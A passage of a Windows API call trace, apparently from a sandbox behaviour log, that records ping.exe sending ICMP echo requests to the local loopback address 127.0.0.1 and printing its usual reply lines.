0x76ea176c [0109.789] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0109.789] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0109.789] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.791] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.791] _fileno (_File=0x76ea4c28) returned 1 [0109.791] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.791] GetFileType (hFile=0x28) returned 0x2 [0109.791] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdceff8 | out: lpMode=0xdceff8) returned 0 [0109.791] GetLastError () returned 0x6 [0109.791] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef5c, nSize=0x50 | out: lpBuffer="䤐ċ") returned 0x0 [0109.791] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0109.793] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xdcf014 | out: phkResult=0xdcf014*=0x88) returned 0x0 [0109.793] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xdcf008, lpData=0xdcf010, lpcbData=0xdcf00c*=0x4 | out: lpType=0xdcf008*=0x0, lpData=0xdcf010*=0x0, lpcbData=0xdcf00c*=0x4) returned 0x2 [0109.793] RegCloseKey (hKey=0x88) returned 0x0 [0109.793] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xdcefd8*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdcf014 | out: ppResult=0xdcf014*=0x10bc4d0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x10b8928*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0109.793] FreeAddrInfoW (pAddrInfo=0x10bc4d0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x10b8928*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0109.793] IcmpCreateFile () returned 0x10b6c98 [0109.796] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x10bc3e0 [0109.796] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x10c5270 [0109.796] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xdcf110, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0109.797] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="竈Č隆Ü┗\x94䰨盪❋") returned 0x14 [0109.798] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.798] _fileno (_File=0x76ea4c28) returned 1 [0109.798] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.798] GetFileType (hFile=0x28) returned 0x2 [0109.798] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0109.798] GetLastError () returned 0x6 [0109.798] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü❋") returned 0x0 [0109.798] _fileno (_File=0x76ea4c28) returned 1 [0109.798] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0109.798] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x10c7b00 [0109.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x10c7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0109.798] _fileno (_File=0x76ea4c28) returned 1 [0109.798] _write (in: _FileHandle=1, _Buf=0x10c7b00*, _MaxCharCount=0x14 | out: _Buf=0x10c7b00*) returned 20 [0109.798] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.798] _fileno (_File=0x76ea4c28) returned 1 [0109.798] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.798] LocalFree (hMem=0x10c7b00) returned 0x0 [0109.798] LocalFree (hMem=0x10c7ac8) returned 0x0 [0109.798] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="竈Č隆Ü▪\x94䰨盪❚") returned 0x18 [0109.798] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.798] _fileno (_File=0x76ea4c28) returned 1 [0109.798] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.798] GetFileType (hFile=0x28) returned 0x2 [0109.798] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0109.798] GetLastError () returned 0x6 [0109.798] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü❚") returned 0x0 [0109.798] _fileno (_File=0x76ea4c28) returned 1 [0109.798] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.798] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x10bc458 [0109.798] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x10bc458, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0109.798] _fileno (_File=0x76ea4c28) returned 1 [0109.798] _write (in: _FileHandle=1, _Buf=0x10bc458*, _MaxCharCount=0x18 | out: _Buf=0x10bc458*) returned 24 [0109.798] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.798] _fileno (_File=0x76ea4c28) returned 1 [0109.798] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.798] LocalFree (hMem=0x10bc458) returned 0x0 [0109.798] LocalFree (hMem=0x10c7ac8) returned 0x0 [0109.799] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0109.799] IcmpSendEcho2Ex (in: IcmpHandle=0x10b6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x10bc3e0, RequestSize=0x20, RequestOptions=0xdcf084, ReplyBuffer=0x10c5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x10c5270) returned 0x1 [0109.799] InetNtopW (in: Family=2, pAddr=0xdcf074, pStringBuf=0xdcf19c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0109.799] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="笰Č隆Ü⛔\x94䰨盪✣") returned 0x16 [0109.800] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.800] GetFileType (hFile=0x28) returned 0x2 [0109.800] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0109.800] GetLastError () returned 0x6 [0109.800] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✣") returned 0x0 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.800] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0109.800] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x10c7b68 [0109.800] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x10c7b68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _write (in: _FileHandle=1, _Buf=0x10c7b68*, _MaxCharCount=0x16 | out: _Buf=0x10c7b68*) returned 22 [0109.800] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.800] LocalFree (hMem=0x10c7b68) returned 0x0 [0109.800] LocalFree (hMem=0x10c7b30) returned 0x0 [0109.800] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="笰Č隆Ü⛿\x94䰨盪✼") returned 0x9 [0109.800] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.800] GetFileType (hFile=0x28) returned 0x2 [0109.800] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0109.800] GetLastError () returned 0x6 [0109.800] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✼") returned 0x0 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.800] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0109.800] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b8988 [0109.800] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x10b8988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _write (in: _FileHandle=1, _Buf=0x10b8988*, _MaxCharCount=0x9 | out: _Buf=0x10b8988*) returned 9 [0109.800] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.800] LocalFree (hMem=0x10b8988) returned 0x0 [0109.800] LocalFree (hMem=0x10c7b30) returned 0x0 [0109.800] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdcf00c, nSize=0x0, Arguments=0xdcf008 | out: lpBuffer="笰Č隆Ü➷\x94䰨盪✧") returned 0x9 [0109.800] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.800] _fileno (_File=0x76ea4c28) returned 1 [0109.800] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.800] GetFileType (hFile=0x28) returned 0x2 [0109.800] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefd0 | out: lpMode=0xdcefd0) returned 0 [0109.800] GetLastError () returned 0x6 [0109.800] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef34, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0109.801] _fileno (_File=0x76ea4c28) returned 1 [0109.801] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.801] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0109.801] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b8a18 [0109.801] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x10b8a18, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0109.801] _fileno (_File=0x76ea4c28) returned 1 [0109.801] _write (in: _FileHandle=1, _Buf=0x10b8a18*, _MaxCharCount=0x9 | out: _Buf=0x10b8a18*) returned 9 [0109.801] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.801] _fileno (_File=0x76ea4c28) returned 1 [0109.801] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0109.801] LocalFree (hMem=0x10b8a18) returned 0x0 [0109.801] LocalFree (hMem=0x10c7b30) returned 0x0 [0109.801] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="笰Č隆Ü⟘\x94䰨盪✨") returned 0x9 [0109.801] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.801] _fileno (_File=0x76ea4c28) returned 1 [0109.801] _get_osfhandle (_FileHandle=1) returned 0x28 [0109.801] GetFileType (hFile=0x28) returned 0x2 [0109.801] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0109.801] GetLastError () returned 0x6 [0109.801] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✨") returned 0x0 [0109.801] _fileno (_File=0x76ea4c28) returned 1 [0109.801] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0109.801] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0109.801] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b8988 [0109.801] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x10b8988, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0109.801] _fileno (_File=0x76ea4c28) returned 1 [0109.801] _write (in: _FileHandle=1, _Buf=0x10b8988*, _MaxCharCount=0x9 | out: _Buf=0x10b8988*) returned 9 [0109.801] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0109.801] _fileno (_File=0x76ea4c28) returned 1 [0109.801] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0109.801] LocalFree (hMem=0x10b8988) returned 0x0 [0109.801] LocalFree (hMem=0x10c7b30) returned 0x0 [0109.801] Sleep (dwMilliseconds=0x3e8) [0110.808] IcmpSendEcho2Ex (in: IcmpHandle=0x10b6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x10bc3e0, RequestSize=0x20, RequestOptions=0xdcf084, ReplyBuffer=0x10c5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x10c5270) returned 0x1 [0110.808] InetNtopW (in: Family=2, pAddr=0xdcf074, pStringBuf=0xdcf19c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0110.808] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="羠Č隆Ü⛔\x94䰨盪✣") returned 0x16 [0110.808] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0110.808] _fileno (_File=0x76ea4c28) returned 1 [0110.808] _get_osfhandle (_FileHandle=1) returned 0x28 [0110.808] GetFileType (hFile=0x28) returned 0x2 [0110.808] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0110.808] GetLastError () returned 0x6 [0110.808] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✣") returned 0x0 [0110.808] _fileno (_File=0x76ea4c28) returned 1 [0110.809] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0110.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0110.809] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x10c7fd8 [0110.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x10c7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0110.809] _fileno (_File=0x76ea4c28) returned 1 [0110.809] _write (in: _FileHandle=1, _Buf=0x10c7fd8*, _MaxCharCount=0x16 | out: _Buf=0x10c7fd8*) returned 22 [0110.809] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0110.809] _fileno (_File=0x76ea4c28) returned 1 [0110.809] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0110.809] LocalFree (hMem=0x10c7fd8) returned 0x0 [0110.809] LocalFree (hMem=0x10c7fa0) returned 0x0 [0110.809] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="羠Č隆Ü⛿\x94䰨盪✼") returned 0x9 [0110.809] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0110.809] _fileno (_File=0x76ea4c28) returned 1 [0110.809] _get_osfhandle (_FileHandle=1) returned 0x28 [0110.809] GetFileType (hFile=0x28) returned 0x2 [0110.809] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0110.809] GetLastError () returned 0x6 [0110.809] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✼") returned 0x0 [0110.809] _fileno (_File=0x76ea4c28) returned 1 [0110.809] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0110.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0110.809] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b8928 [0110.809] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x10b8928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0110.809] _fileno (_File=0x76ea4c28) returned 1 [0110.809] _write (in: _FileHandle=1, _Buf=0x10b8928*, _MaxCharCount=0x9 | out: _Buf=0x10b8928*) returned 9 [0110.809] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0110.809] _fileno (_File=0x76ea4c28) returned 1 [0110.809] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0110.809] LocalFree (hMem=0x10b8928) returned 0x0 [0110.809] LocalFree (hMem=0x10c7fa0) returned 0x0 [0110.809] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdcf00c, nSize=0x0, Arguments=0xdcf008 | out: lpBuffer="羠Č隆Ü➷\x94䰨盪✧") returned 0x9 [0110.809] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0110.809] _fileno (_File=0x76ea4c28) returned 1 [0110.809] _get_osfhandle (_FileHandle=1) returned 0x28 [0110.809] GetFileType (hFile=0x28) returned 0x2 [0110.809] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefd0 | out: lpMode=0xdcefd0) returned 0 [0110.810] GetLastError () returned 0x6 [0110.810] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef34, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0110.810] _fileno (_File=0x76ea4c28) returned 1 [0110.810] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0110.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0110.810] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b8928 [0110.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x10b8928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0110.810] _fileno (_File=0x76ea4c28) returned 1 [0110.810] _write (in: _FileHandle=1, _Buf=0x10b8928*, _MaxCharCount=0x9 | out: _Buf=0x10b8928*) returned 9 [0110.810] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0110.810] _fileno (_File=0x76ea4c28) returned 1 [0110.810] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0110.810] LocalFree (hMem=0x10b8928) returned 0x0 [0110.810] LocalFree (hMem=0x10c7fa0) returned 0x0 [0110.810] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="羠Č隆Ü⟘\x94䰨盪✨") returned 0x9 [0110.810] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0110.810] _fileno (_File=0x76ea4c28) returned 1 [0110.810] _get_osfhandle (_FileHandle=1) returned 0x28 [0110.810] GetFileType (hFile=0x28) returned 0x2 [0110.810] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0110.810] GetLastError () returned 0x6 [0110.810] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✨") returned 0x0 [0110.810] _fileno (_File=0x76ea4c28) returned 1 [0110.810] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0110.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0110.810] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x10b89e8 [0110.810] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x10b89e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0110.810] _fileno (_File=0x76ea4c28) returned 1 [0110.810] _write (in: _FileHandle=1, _Buf=0x10b89e8*, _MaxCharCount=0x9 | out: _Buf=0x10b89e8*) returned 9 [0110.810] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0110.810] _fileno (_File=0x76ea4c28) returned 1 [0110.810] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0110.810] LocalFree (hMem=0x10b89e8) returned 0x0 [0110.810] LocalFree (hMem=0x10c7fa0) returned 0x0 [0110.810] Sleep (dwMilliseconds=0x3e8) [0111.823] IcmpSendEcho2Ex (in: IcmpHandle=0x10b6c98, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x10bc3e0, RequestSize=0x20, RequestOptions=0xdcf084, ReplyBuffer=0x10c5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x10c5270) returned 0x1 [0111.824] InetNtopW (in: Family=2, pAddr=0xdcf074, pStringBuf=0xdcf19c, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0111.824] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: lpBuffer="羠Č隆Ü⛔\x94䰨盪✣") returned 0x16 [0111.824] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.824] _fileno (_File=0x76ea4c28) returned 1 [0111.824] _get_osfhandle (_FileHandle=1) returned 0x28 [0111.824] GetFileType (hFile=0x28) returned 0x2 [0111.824] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdcefcc | out: lpMode=0xdcefcc) returned 0 [0111.824] GetLastError () returned 0x6 [0111.824] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdcef30, nSize=0x50 | out: lpBuffer="Ü✣") returned 0x0 [0111.824] _fileno (_File=0x76ea4c28) returned 1 [0111.824] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0111.824] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0111.824] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x10c7fd8 [0111.824] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x10c7fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0111.824] _fileno (_File=0x76ea4c28) returned 1 [0111.824] _write (in: _FileHandle=1, _Buf=0x10c7fd8*, _MaxCharCount=0x16 | out: _Buf=0x10c7fd8*) returned 22 [0111.824] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0111.824] _fileno (_File=0x76ea4c28) returned 1 [0111.824] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0111.824] LocalFree (hMem=0x10c7fd8) returned 0x0 [0111.824] LocalFree (hMem=0x10c7fa0) returned 0x0 [0111.824] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdcf008, nSize=0x0, Arguments=0xdcf004 | out: 